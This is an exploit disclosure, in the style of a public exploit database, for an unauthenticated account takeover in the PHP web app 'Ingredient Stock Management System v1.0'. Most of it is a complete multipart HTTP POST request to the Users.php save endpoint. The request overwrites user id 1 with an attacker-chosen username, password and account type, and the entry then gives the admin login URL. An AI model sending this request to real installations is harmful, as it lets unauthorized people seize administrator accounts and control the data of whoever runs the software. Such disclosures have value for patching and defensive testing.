# Exploit Title: Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated) # Date: 28/05/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: XAMPP, Linux Description : ---------------------- Ingredient Stock Management System v1.0 is vulnerable to unauthenticated account takeover. An attacker can takeover any registered 'Staff' user account by just sending below POST request By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters # HTTPS Request : POST /isms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------89160456138077069512415726555 Content-Length: 1023 Origin: http://localhost Connection: close Referer: http://localhost/isms/admin/?page=user/manage_user Cookie: PHPSESSID=mia3uiom2s9bdtif290t6v1el2 -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="id" 1 -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="firstname" test -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="middlename" -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="lastname" hi -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="username" test -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="password" test -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="type" 1 -----------------------------89160456138077069512415726555 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------89160456138077069512415726555-- ==== URL Login : http://localhost/isms/admin/login.php